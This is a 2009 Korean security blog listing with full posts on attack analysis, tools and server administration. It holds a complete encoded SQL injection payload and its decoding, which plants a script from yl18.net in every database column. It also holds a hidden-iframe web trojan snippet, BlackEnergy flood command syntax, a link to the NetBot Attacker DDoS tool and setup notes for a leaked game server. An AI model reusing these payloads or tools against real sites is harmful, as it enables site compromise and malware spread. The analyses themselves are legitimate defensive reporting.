Search Results for '해킹&보안'


207 posts related to '해킹&보안'

  1. 2009/08/11 [Tip] IIS 로그에 프록시 Real 공격자 IP 로그 남기기
  2. 2009/08/11 보안 진단툴인가 해킹 툴인가
  3. 2009/08/11 웹 트로이목마 생성기
  4. 2009/08/11 Windows 2008 서버의 새로운 기능(Hyper-V)
  5. 2009/08/11 Mass Exploits with SQL Injection
  6. 2009/08/11 [툴 소개] Trend Micro RUbotted
  7. 2009/08/11 천당2기술
  8. 2009/08/11 무자헤딘 비밀(Mujahedeen Secret)
  9. 2009/08/11 패스워드 없이 Lock 된 Windows XP Unlock
  10. 2009/08/11 Social Engineering Hacking - Humans get Hacked
  11. 2009/08/11 신종 DoS 공격 - SQL 와일드카드 공격
  12. 2009/08/11 Shockwave Exploit
  13. 2009/08/11 DB 취약점 스캐너
  14. 2009/08/11 DDoS 공격 툴 NetBot Attacker
  15. 2009/08/11 웹기반의 DDoS botnet, BlackEnergy
  16. 2009/08/10 [서버운영] 기특한 모니터링 도구 - Monit!!
  17. 2009/08/05 DDoS 악성코드 전용백신 2
  18. 2009/07/31 Top 10 윈도 해킹툴
  19. 2009/07/31 MD5 checksum 을 비교해 준다 - Rizone MD5 Checksum Calculator" v0.0.5.58
  20. 2009/07/31 netstat -s 명령어 옵션
  21. 2009/07/27 액티브 디렉터리는 기반 시설이다
  22. 2009/07/27 tinyget을 이용한 웹 서비스 점검하기 12
  23. 2009/07/27 중국발 해킹, 마술의 경지? 2
  24. 2009/07/27 IIS WebDAV 보안 우회 취약점 발견돼
  25. 2009/07/27 Dos공격 방어 (mod_evasive) 설치
  26. 2009/07/16 Milw0rm 사이트에 올려진 MSSQL Injection 공격 기법에 대한 페이퍼
  27. 2009/06/18 이것저것 해킹툴 - 7
  28. 2009/06/18 포트스캔 툴 - nmap
  29. 2009/06/18 포트스캔소스 3
  30. 2009/06/18 리눅스 시스템에서 shadow 파일 가져오기 1

중국애들이 ccproxy를 통해 해킹시도할 때 real ip가 숨겨지죠. 그렇다고 real ip 못찾는 건 아니지만 IIS 로그에서 프록시를 통해서 Request 한 실제 IP를 남기는 설정방법이 있습니다.

몇몇 프록시 서버는 HTTP 헤더에 "X-Forwarded-For"추가하여 실제 공격자 IP를 포함시키는 경우가 있습니다.

이것을 IIS에서 남기도록 제한하는 설정으로 ASP 코드에 "Respnse.AppendToLog" 메소드를 사용하여 URL 쿼리상에 남기도록 설정할 수 있습니다.

단 이때 제약 사항은 IIS 로그에는 남지 않고 URI에서 나타나기 때문에 "pipe( | )" 문자로 구분해 줘야 합니다.

아래 ASP 코드는 Proxy 헤더 로그를 추가하도록 설정하는 방법입니다.

<%

   sHeader = Request.ServerVariables("X-Forwarded-For")

   if Len(sHeader)

     Then

            Response.AppendToLog " | " & sHeader

%>

 

추가로 포워드된 Proxy 헤더 정보가 남기게 됩니다.

Client IP, Remote_Addr, Remote_Host, Forwarded, VIA, HTTP_From, Remote_Host_Wp, Xconnection, Xroxy_Connection, X_Locking

2009/08/11 14:42 2009/08/11 14:42
류광으로 유명한 netXeyes에서 만든 상용제품으로 matrixay 라는 DB 보안진단툴입니다.
사용자 삽입 이미지
2009/08/11 14:40 2009/08/11 14:40

요즘 유행하는 웹 트로이목마를 만드는 자바스크립트

1. 아래와 같은 iframe에 있는 사이트의 test.html 파일에는 악의적인 js가 숨겨져 있다.

<iframe src=http://www.test.com/test.html width=100 height=0 frameborder=0>

2. 숨겨진 js에 들어 있는 내용
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.test.com\/\/z1.jpg\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.test.com\/\/z2.jpg\'
\"><\/DIV><\/DIV><\/BODY><\/HTML>")

3. test.js

<script src="http://www.test.com/test.js"></script>

2009/08/11 14:36 2009/08/11 14:36

Windows 2008 서버에는 Hyper-V라는 새로운 기능이 추가되어 있다고 합니다.
이 Hyper-V 는 한마디로 가상화 핵심기술이 다 녹아 들었습니다. 향후 가상화 기술이 보안기술의 핵심으로 등장할 전망입니다.

MS와 VMware가 가상화로 일대 생존을 건 치열한 격전을 치르게 될 것은 분명하고요.
일단 Hyper-V에서 지원되는 핵심기능을 살펴보면 입이 딱 벌어질 정도로 다음과 같습니다.

1. 가상 랜(Virtual LAN) 지원
2. 가상 머신을 위한 대용량 메모리 지원
3. 동시에 32비트와 64비트 구동
4. 각각의 가상 O/S(Guest OS라고 부르는 것 같음)마다 4CPU와 32GB 메모리 지원
5. 가상 머신을 위한 원 프로세스 또는 다수 프로세스 지원
6. Snapshot 기능 지원(VMware에서 가상 머신의 상태를 잠시 캡쳐해두고 멈추는 기능)
7. 간편한 마이그레이션 지원(VMware의 VMotion 기능과 유사한 것)으로 셧다운 없이 하나의 가상머신에서 다른 머신으로 옮겨지는 기능 지원
8. 가상 머신마다 네트워크 로드 발렌싱 기능 지원
9. 마이크로소프트의 가상 머신 관리자(Microsfot Virtual Machine Manager)로 중앙에서 가상 머신을 관리할 수 있음

2009/08/11 14:28 2009/08/11 14:28
본 글은 isc.sans.org에 올라온 글을 참조해서 재구성한 것이다.
다음 로그는 공격로그의 한 부분이다. 공격 로그 중 SQL 구문이 GET 부분에 들어가 있는 것을 볼 수 있다.

GET /home/site_content_3.asp

s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C00610072006500200040006D00200076006100720063006800610072002800380030003000300029003B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D002000640062006F002E007300790073006F0062006A006500630074007300200061002C00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00640062006F002E007300790073007400790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027005500270061006E006400200062002E00780074007900700065003D0063002E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760061007200630068006100720027003B00730065007400200040006D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D005200450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B00%20AS%20NVARCHAR(4000));EXEC(@S);--


위에서 보다시피 실제 구문은 인코딩되어 있어 금방은 알 수 없게 했다.
공격자는 CAST 구분을 사용해서 공격을 쉽게 탐지하지 못하도록 혼란 공격(Obfuscate Attack) 기법을 사용하고 있다.
CAST 구문은 타입을 다른 타입으로 Convert 시켜주는 역할을 한다.
CAST 된 구문은 "@S"의 Input 되고 실행이 된다.

이 코드를 아래 펄 명령어를 사용해서 디코딩한 것이 다음과 같다.

$ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output


[디코딩 결과]

declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);


이 SQL 구문은 sysobject 테이블을 type U(User) 테이블의 모든 row를 가져오는 것이다.
결국 각 오브젝트에 yl18.net. 사이트 주소 코드를 추가하도록 업데이트 명령을 실행 시키는 구문이다.
이 공격을 받은 웹 사이트는 IIS와 MS SQL 서버가 설치된 경우이다. 특히 주목할 것이 바로 Evading을 하기 위해서 CAST나 CONVERT 명령어를 쓴다는데 유의해야 한다.

[원문]

Published: 2008-01-09,
Last Updated: 2008-01-09 09:05:44 UTC
by Bojan Zdrnja (Version: 1)
http://isc.incidents.org/diary.html?storyid=3823
2009/08/11 14:21 2009/08/11 14:21
트렌드마이크로에서 사용자 PC의 bot 같은 Activity를 모니터링하는 간단한 툴입니다.

[다운로드]
http://www.trendsecure.com/portal/en-US/tools/security_tools/rubotted
2009/08/11 14:20 2009/08/11 14:20

워낙 중국 해커들 게임해킹 실력은 장난이 아니라서 왠만한 게임분석은 어렵지 않게 합니다.
옛날 중국애들이 분석한 리니지2 (천당2)의 게임를 분석한 내용입니다. 대충 보시면 어떻게 구성되고 구동되는지 짐작할 수 있습니다.

必备条件:
1、操作系统 Windows 2003 Enterprise Edition
2、数据库   Microsoft SQL Corpotation 2000+SP4
3、天堂II服务端程序

L2server.exe  及其相关配置文件
L2NPC.exe    及其相关配置文件
L2AuthD.exe  及其相关配置文件
Cached.exe  及其相关配置文件
Html 以及 Scrip t脚本目录
GeoData  地图文件
Patch.dll  四章功能扩展文件

4、数据库脚本
① lin2comm_new(IP) 脚本内包含服务器IP地址、数据库访问用户名(gamma)、对应用户名的密码用记事本打开修改一下
② 1_lin2db
③ 2_lin2db_update
④ lin2report
⑤ lin2user
⑥ 1_lin2world 脚本内包含服务器IP地址、数据库访问用户名(gamma)、对应用户名的密码 用记事本打开修改一下
⑦ 2_lin2world(这个是四章的第二个Lin2world库的脚本)

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /3GB
减少lin2server停止错误(加完/3GB以后不要加载任何启动程序例如:防火墙系统容易蓝屏需要启动安全模式下删除启动程序)

之前请先确认你从来没有运行过服务器端的应用程序,如果运行了,请运行regedit删除
[HKEY_LOCAL_MACHINE\SOFTWARE\NCSOFT]
[HKEY_LOCAL_MACHINE\SOFTWARE\PROJECT_L2]
这两个键值,如果没有运行过轻跳过这一步,进入下面的步骤

调整好了操作系统之后就可以开始安装SQL了。SQL的安装过程就不用我多说了吧?自己记住SA的密码就好了。
安装好SQL之后打开企业管理器依次创建 Lin2comm Lin2db Lin2report Lin2user Lin2world这5个数据库。创建好了之后进入安全性--〉登陆 创建一个名为gamma的用户,然后在创建窗口最上面选择数据库访问标签。依次给Lin2comm Lin2db Lin2report Lin2user Lin2world这5个数据库选中Public以及db_owner角色。5个数据库全都要选择这2个角色。然后点确定,再次输入Gamma的确认密码就Ok了。

将Patch.dll复制到windows\system32 并且设置只读属性。

然后去ODBC建立文件DSN。过程:选择文件DSN标签--〉添加---〉SQL Server---〉下一步---〉数据源名字(和数据库名字一样就OK了。一共5个。)---〉剩下的一路填写相关信息就建立好了。对应5个数据库全部都要建立。

之后建立系统DSN,一共2个,一个指向Lin2db 一个指向Lin2world 使用Windows NT验证方式。

然后打开SQL的查询分析器,输入gamma的用户名和密码,对应每个数据库打开数据库脚本,然后执行就OK了。
注意:Lin2db和Lin2world都有2个脚本。按照顺序依次执行查询。

数据库脚本查询后的重要一步,打开lin2d库中的server表,填入以下内容
PS:此处填写的两个IP地址第一个是外网IP地址,第二个是内网IP,如果不开内网就写外网的。都不能使用域名。为什么别问我,NCsoft说了算。
1   名字   服务器ip   服务器ip   1   1   1   端口
1   XXWZ   222.222.222.222   222.222.222.222   1   1   1   7777

现在开始配置服务器端的配置文件

NewAuth\etc\config.txt

serverPort = 2104
serverExPort = 2106
serverIntPort = 2108
worldport = 7777
DBConnectionNum=10
encrypt = true
numServerThread = 2
numServerExThread = 2
numServerIntThread = 2
logDirectory="d:\l2serverwork\log"
;30206 : l2, 30310 : Sl
ProtocolVersion = 30810
;8:lineage2, 4 halo
GameID=8
DesApply=false
PacketSizeType = 3
ReadLocalServerList=false
OneTimeLogOut=true
CountryCode=3
DevConnectOuter=true
DevServerIP="222.222.222.222" <---此处填写外网IP地址
下面内容省略了。都一样。


L2Server\l2server.ini

[CacheD]
address="222.222.222.222" <---此处填写外网IP地址
port=2006

[AuthD]
;l2server
address="222.222.222.222" <---此处填写外网IP地址
port=2104

[World]
WorldId=3
UserLimit=1500 <---此处是服务器连接最大数限制
;LetBuilder=1

[PetitionD]
address="222.222.222.222" <---此处填写外网IP地址
port=2107
WorldName="publish03"
;world name must be exact 9 characters.

[Report]
Interval=50   <---此处是报告时间,调的长一点可以节约资源

[Setting]
country=3
UserPathFind=false
WorldCollision=false
ExceptionMailing=false
MailServer=mail.ncsoft.co.kr
AcceptLowerProtocol=true
IOBufferCount=6000   <---此处是个重要的参数,机器越差请调整的越低
;limit hour for week, (number means hour. 0 means don't use. default is 0)
playtimelimit=0

reconnectauth=1
;use auth reconn (1:use, 0:don't. default is 0)这里填写0为服务器维护 1为正常开启

www.5 uwl.net
L2NPC\ L2NPC.ini

[CacheD]
address="222.222.222.222" <---此处填写外网IP地址
port=2008

[Server]
address="222.222.222.222" <---此处填写外网IP地址
port=2002

[db]
address="222.222.222.222" <---此处填写外网IP地址
port=2005
user="gamma"     <---此处填写数据库用户名
password="xxxxxxx"   <---此处填写数据库密码

[map]
directory="geodata"

[LogD]
address="222.222.222.222" <---此处填写外网IP地址
port=3999

[World]
WorldId=3

[Setting]
country=3
ExceptionMailing=false
MailServer=ncs-mail.ncsoft.co.kr

全部配置完成后,请依次运行运行:

CacheD--------------------第1个启动
第一次输入
File DB:lin2world
Log Name:gamma
Passwoed:你的gamma密码
第二次输入
File DB:lin2comm
Log Name:gamma
Passwoed:你的gamma密码
NewAuth------------------第2个启动
File DB:lin2db
Log Name:gamma
Passwoed:你的gamma密码
L2Server------------------第3个启动
L2NPC--------------------第4个启动

2009/08/11 14:18 2009/08/11 14:18

최근 Zone-h.org에서 이슬람 해킹 툴에 관한 흥미로운 기사가 하나 있었습니다.
이슬람 해킹은 우리에게는 아직은 낯설게 느껴지고 있습니다.
무자헤딘 비밀2(Mujahedeen Secrets)라고 하는 툴에 관한 이야기 입니다.
이 툴은 글로벌 이슬람 미디어 프론트(Global Islamic Media Front)라는 단체에서 배포하는 암호화 툴이라고 합니다.
"Asrar Al-Mujahidin" 또는 "Mujahedeen Secrets"라고도 하며 알카에다나 탈레반이 인터넷으로 통신할 때 게시판 내용, 메신저나 채팅 내용을 암호화시켜주는 툴입니다.  
이 프로그램은 멀티케스트 이슬람 네트워크 망을 보호하고 그 포함되는 모든 컨텐츠들을 아주 작은 사이즈로 암호화 시켜준다고 합니다.

글쎄 AES는 미국 NIST에서 만든 암호 알고리즘인데 암호화 알고리즘을 미국 걸 쓴다니 아이러니합니다. 이것으로 미국의 강력한 인터넷 도청을 피할 수 있다고 생각하고 있는 것은 아닌지..

1) 첫번째 버전에 포함된 기능   

- 5가지의 강력한 암호화 알고리즘(AES finalist algorithms)
- symmetrical encryption keys 256-bit (Ultra Strong Symmetric Encryption).
- encryption keys for symmetric length of 2048-bit RSA (private and public).
- ROM 압축(compression) (highest levels 압축)
- stealthy ciphering
- cipher auto-detection.
- sile shredder

2) 두번째 버전에 포함된 기능

- messaging 보호
- files to text encoding
- checking digital signatures of files
- creating digital signature of the file

2009/08/11 14:18 2009/08/11 14:18

2006년 뉴질랜드의 한 보안 컨설턴트가 발견한 방법이라고 합니다. 아직 패치는 나오지 않은 상태이고 Windows XP가 화면 잠김 상태일때 패스워드 없이도 Unlock 시킬 수 있는 툴을 하나 만들어서 발표을 한 모양입니다. Firewire라는 걸 이용한다고 합니다.


원문)
http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html

주) Firewire란
미국 애플 컴퓨터 회사와 텍사스 인스트루먼트(Texas Instruments)사가 공동으로 제창한 고속 직렬 데이터 버스 규격. 케이블의 전기적 특성이나 접속기의 형상 등 물리적인 부분에 대해서 결정된 규격으로, 후에 IEEE 1394로 규격화되었다. IEEE 1394는 주로 PC와 AV 기기의 접속을 상정한 통신 규격으로서 디지털 동화상 전송 등을 의식해서 만든 것이다. ‘Fire-Wire’라는 명칭은 ‘불에 타서 연기가 올라가는 만큼 빠른 속도’라는 의미에서 붙여졌다.

  IEEE 1394의 규격은 파이어와이어 400과, 800이 있는데 각각 약 100/200/400Mbps, 800Mbps의 전송 속도를 지원한다. 두 규격은 모두 핫 플러깅을 지원한다.
IEEE 1394, 혹은 파이어와이어(FireWire), 아이링크(i.Link)는 같은 말이다.

2009/08/11 14:17 2009/08/11 14:17

해킹기술은 눈부신 정도로 엄청난 기술 발전를 가져오고 있다.
이제는 직접 서버를 해킹하지 않아도 해킹할 수 있는 기술들이 속속 등장하고 있다. 인터넷 곳곳이 다 지뢰밭인 셈이다.
웹서핑할 때 마다 악성코드가 숨겨진 것이 없는지 부비트랩이나 함정 탐지하듯 해야 하는 시대가 되가고 있다.
해킹기술의 최고 정점은 Human Hacking이다.

Did you know that humans get Hacked as much as computers?
It is called social engineering and it has been happening long before computers ever existed!
 
바로 사회공학적인 공학기법이다. 컴퓨터가 존재하기도 전에 이 방법은 존재했었다.

1. Hacking Humans

Social engineering is the human side of breaking into a corporate network. Companies like ours with authentication processes, firewalls, VPNs and network monitoring software are still wide open to an attack if an employee unwittingly gives away key information in an email, by answering questions over the phone with someone they don't know or failing to ask the right questions.


2. Social Engineering, an Example
AOL experienced a social engineering attack that compromised their system and revealed confidential information of more than 200 accounts. In that case the caller contacted AOL's tech support and spoke with an employee for an hour. During the conversation the caller mentioned that his car was for sale at a great price. The employee was interested, so the caller sent an e-mail attachment with a picture of the car. Instead of a car photo, the mail executed a backdoor exploit that opened a connection out from AOL through the firewall. Through this combination of social engineering and technical exploitation, the caller gained access to the internal network.


3. Forms of Social Engineering
Social engineering is not limited to phone calls; many organizations have reported cases involving visitors impersonating a telephone repair technician requesting access to a wiring closet or a new member of the IT department needing help accessing a file.

People, for the most part, look at social engineering as an attack on their intelligence and no one wants to be considered "ignorant" enough to have been a victim. It's important to remember that no matter who you are, you are susceptible to a social engineering attack.

If you suspect social engineering – don't be afraid to ask questions and/or notify your IT department. If a caller requests information that is technical in nature, please refer them to your IT department.


[원문]
http://www.auditmypc.com/freescan/readingroom/social-engineering.asp

2009/08/11 14:16 2009/08/11 14:16
웹 사이트의 검색부분은 보통 SQL SELECT 구문의 LIKE절에 들어가게 됩니다. 이 공격은 LIKE절에 Wildcard 문자들을 무작위를 입력하여 SQL 서비스 퍼포먼스를 떨어드리는 새로운 형태의 서비스 거부 공격입니다.

[다운로드]


2009/08/11 14:11 2009/08/11 14:11
We have discovered one interesting technique to hide malicious code from researchers.

--> 우리는 보안연구자들에게서 악성코드를 숨기는 재미난 기술을 한가지 발견했다.
The initial infection was common iframe injection on a web page. The iframe page loaded tiny shockwave file, which was only 158 bytes long!

--> 초기 감염방식은 일반적인 웹페이지 iframe 삽입이다. iframe 페이지는 아주 조그만 쇼크웨이브 파일에 실행이 되는데 그 크기 딱 158바이트이다
 
This file uses internal ActionScript global variable ("$version") to get the version of user's OS and plugin for handling Shockwave files.
--> 이 파일은 내부의 ActionScript 전역변수("$version")로 사용자 OS 버전정보를 가져오거나 쇼크웨이브 처리하는 플러그인에 사용된다.

사용자 삽입 이미지


The $version variable evaluates to something like "WIN 9,0,12,0", which is short platform name, version and revision numbers of Adobe Flash Player plugin. After that 4561.SWF tries to download and run another .SWF basing on this string. In the case above it tried to download "WIN 9,0,12,0i.swf" file.

The server replied with famous ERROR 404: “File Not Found”. But that was done for purpose. If the 4561.swf file was tested
--> 서버는 ERROR 404:"File Not Found"로 응답한다.  그러나 그것이 사실상 의도된대로 수행되어 진 것이다.
on an automated sandbox a researcher may have not notice the fact that unavailability of the second .SWF file was not due to the absence of malicious code on the server, but due to the different Adobe Flash Player plugin that was used in the sandbox.

I have checked all the possible versions and found 6 different .SWF exploits.
--> 6개의 .SWF 해킹코드를 발견했다.

WIN 9,0,115,0i.swf
WIN 9,0,16,0i.swf
WIN 9,0,28,0i.swf
WIN 9,0,45,0i.swf
WIN 9,0,47,0i.swf
WIN 9,0,64,0i.swf

The files were already detected by our engine as Exploit.SWF.Downloader.c but they were new variations and were not in malware collection. The first sample of Exploit.SWF.Downloader was detected on 2008-05-27.

This exploit uses a vulnerability of Adobe Flash Player, built on incorrect image size handling. I discovered embedded jpeg data with wrong image size inside.


사용자 삽입 이미지



So, to draw the line, I would like to repeat that this technique allows to carefully download specific exploits for specific version of the vulnerable Adobe Flash Player plugin and at the same time allows to hide the actual malicious code from curious researchers.

나머지는 번역하기 넘 귀찮아서 천천히 할게요 ^^
2009/08/11 14:08 2009/08/11 14:08
국내 DB 보안 제품인 사크라를 만든 웨어벨리에서 최근에 만든 DB 취약점 스캐너인 Cyclone입니다.
트라이얼 버전을 사용해 보고 있는데 괜찮게 잘 나오는 것 같습니다.
DB 취약점이 다소 어려운 면이 있는 것도 사실입니다. 사실 DBA는 취약점 자체가 뭘 의미하는지 모르기 때문입니다.
과연 그럴때는 어떻게 접근해야 할 까 참 고민을 많이 하게 됩니다.
사용자 삽입 이미지
사용자 삽입 이미지
2009/08/11 14:03 2009/08/11 14:03

작년에 아이템베이등 국내 아이템 거래 사이트를 초토화 시키고 최근에 웹 사이트를 대상으로 하는 랜섬어택으로 DDoS를 많이 당하고 있는데 사용된 툴이라고 합니다,
아래 사이트에서 공격 데모를 보여주고 있습니다.
데모 화면을 보시면 중국해커 PC에 어떤 프로그램이 설치되어 있는지 그리고 주로 무슨 툴을 사용하는지도 엿볼 수 있습니다.
여기서 해커의 성향을 엿볼 수 있는데 지금 데모를 하는 중국해커는 공격성향이 강한 사람 같습니다. 데모지만 실제 서비스 사이트에 대해 주저하지 않고 공격을 해버립니다.
근데 한가지 의문은 데모에서 단지 5대의 좀비 PC로 웹 서버가 죽는게 이상합니다. 5대 좀비 PC 가지고 대량의 트래픽 발생한다는 것은 불가능한데도 웹 서버가 죽는 것 보면 뭔가 특별한 DoS 공격인 것 같습니다.
잘 보시면 DoS 공격 타입이 CC Attack 타입을 선택하고 있습니다. 이 부분이 핵심입니다.
PC 화면에 보니 syser, MS VC++, GMER, FBFD.EXE, ooBar2000.exe, Samsung PC Studio3(삼성 휴대폰 연결프로그램), 중국어로 된 각종 기능을 알 수 없는 프로그램들...   아래 화면을 보시면 NetBot Attacker에서 아이피 주소와 한국이라는 도메인이 나오는 부분이 있는데 이게 바로 자동으로 좀비 PC가 해커 PC로 리버스 커넥션한 좀비 PC 리스트입니다. 그리고 옆에다 찍으면 그 좀비 PC가 공격하는 형태입니다.

해킹은 확실히 공격하는 측보다는 막는 측이 불리합니다.
DDoS 공격툴은 확실히 가난하지만 사악한 Hacker자들이 선호하는 무기입니다.

http://www.hackeroo.com/move/netbot_attacker.html

(1) NetBot Attacker 1.6 Public 버전(이 프로그램이 필요하다면 돈주고 사라고 합니다)

사용자 삽입 이미지

사용자 삽입 이미지

(2) NetBot Attacker 2.3 VIP 영문버전(이 버전은 구하기 쉬지가 않음)

좌측 상단은 좀비 PC 리스트이고 우측 하단은 원격에서 쉘로 좀비 PC에 들어가 있는 것으로 추정되고 좌축 하단은 FTP로 파일 업로드 다운로드 하는 매니저 프로그램이다.

사용자 삽입 이미지

이 툴만 있으면 반대로 국내에 좀비 PC를 찾아내는 것이 더 쉬울 듯 합니다. 그러나 일부 좀비 PC가 하나의 가치로 평가되어 Botnet정보가 거액으로 거래된다고 합니다.
NetBot Attacker 2.3 VIP 영문 버전을 구하는 사람은 대박입니다.

(3) 국내외에 좀비 PC 리스트를 한눈에 확인할 수 있다.

사용자 삽입 이미지
 
2009/08/11 13:59 2009/08/11 13:59
IRC기반의 botnet이 아닌 웹기반의 botnet으로, 러시아의 해커가 만들었다. C&C(Command & Control) 서버(명령을 내리고, 조종하는 서버. BlackEnergy에서는 웹 페이지가 이에 해당)는 러시아나 말레이지아에 위치에 있으며, 주로 러시아를 공격 대상으로 한다.

BlackEnergy는 크게 2가지로 구성되어 있다.

1. 웹기반의 C&C를 제공한다. (php+MySQL)
2. DDoS공격 bot을 생성하는 툴(builder.exe)을 제공한다.
   builder.exe 툴을 이용하여 웹기반 bot관리 서버로 접속하는 바이너리파일을 생성할 수 있게 된다.
사용자 삽입 이미지

[ 이미지 출처 : 글 끝에 소개한 URL ]

bot 바이너리는 지정한 C&C서버로 접속하게 된다. 그리고, bot과 제어서버간의 명령은 웹을 통해서 이뤄지게 되며, 구조는 대략 이렇다.

1. bot은 C&C 서버의의 URL(예. http://웹서버/경로/stat.php )을 체크하게 된다. 이 때 id, build_id 값을 POST방식으로 넘긴다.
2. 서버에서는 명령 등의 상태 값을 BASE64 인코딩된 값으로 리턴을 한다. 그 값에 따라서 bot은 명령을 수행한다.
   다양한 공격 유형이 있는데, ICMP flood, TCP SYN flood, UDP flood, DNS flood, http 요청 등이 있다.
   'flood http foobar.com a.html' 명령을 내린다면 foobar.com/a.html을 계속 호출하게 되며, 'flood syn foobar.com 80'은 TCP SYN flood를 발생한다.

PC에 설치된 bot에 대한 작년 10월 백신 검사 결과를 보니 V3, clamAV, AVG, McAfee 등은 이 바이너리를 못 찾아내고, F-Secure, F-Prot, Kaspersky는 찾아냈다.

보다 자세한 정보는 'BlackEnergy DDoS Bot Web Based C&C'에서 볼 수 있다.
2009/08/11 13:45 2009/08/11 13:45
웹베이스 모니터링 도구입니다..

다운로드 : http://mmonit.com/monit/dist/monit-5.0.3.tar.gz

메뉴얼 :  http://mmonit.com/monit/documentation/monit.html

데몬별로 상태를 확인해서 특정 조건에 도달할경우 명령수행이 가능합니다..

아래 설정은 웹서버를 예로든것입니다..

메모리사용 3072M, childen 500, CPU 95%, port Fail

위 사항이 체크돼면 재시작입니다..

start, stop 스크립트를 만들면 프로세스 정보나 접근기록을 기록할수 있을듯 하네요..

set daemon 120 # Poll at 2-minute intervals
set mailserver 모니터메일서버주소
set logfile syslog facility log_daemon
set alert email
set httpd port 3000 and use address 도메인주소
    allow localhost
    allow 허용할아이피대역
    allow 관리자아이디:비밀번호

check system domain.tld
    if loadavg (1min) > 4 then alert
    if loadavg (5min) > 2 then alert
    if memory usage > 75% then alert
    if cpu usage (user) > 70% then alert
    if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert

check process apache
    with pidfile "/usr/www/apache2/logs/httpd.pid"
    start program = "/usr/www/apache2/bin/apachectl startssl" with timeout 60 seconds
    stop program = "/usr/www/apache2/bin/apachectl stop"
    if 2 restarts within 3 cycles then timeout
    if totalmem > 3072 Mb then alert
    if children > 500 for 5 cycles then stop
    if cpu usage > 95% for 3 cycles then restart
    if failed port 80 protocol http then restart
    group server
    depends on httpd.conf, httpd.bin

check file httpd.conf
    with path /usr/www/apache2/conf/httpd.conf
    if changed checksum
        then exec "/usr/www/apache2/bin/apachectl graceful"

check file httpd.bin
    with path /usr/www/apache2/bin/httpd
2009/08/10 12:29 2009/08/10 12:29
현재 문제 되고 있는 DDoS 전용백신입니다.
 
DDoS 공격관련 참조 사이트 : www.krcert.or.kr (국번없이 118)
 
출처:

이스트소프트 알약전용백신
http://aldn.altools.co.kr/altools/ALYacRemovalTool.exe
http://alyac.altools.co.kr/etc/Notice_Contents.aspx?idx=136

 
 
안철수연구소 전용백신
http://kr.ahnlab.com/dwVaccineView.ahn?num=81&cPage=1
http://kr.ahnlab.com/downLoadFreeVaccine.ahn?filename=v3filecleanex.exe

 
 
 
nProtect 전용백신
http://pds.nprotect.co.kr/pds/scan/nProtectEAVDDoS-Host.com

 
 
카스퍼스키 전용백신
http://www.kaspersky.co.kr/board/bbs/board.php?bo_table=News&wr_id=272&sca=&sfl=wr_subject%7C%7Cwr_content&stx=ddos&sop=and&nca=
DDoS 악성 코드 관련 전용 백신 입니다.
2009/08/05 12:26 2009/08/05 12:26
Top 10 Windows Hacking Tools
This is the Collection of Best Windows Hacking Tools:


1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

http://www.oxid.it/cain.html

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan.htm

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

http://www.gfi.com/adentry.asp?adv=814&loc=3

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

http://www.eeye.com/html/Products/Retina/index.html

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

http://www.samspade.org/ssw/

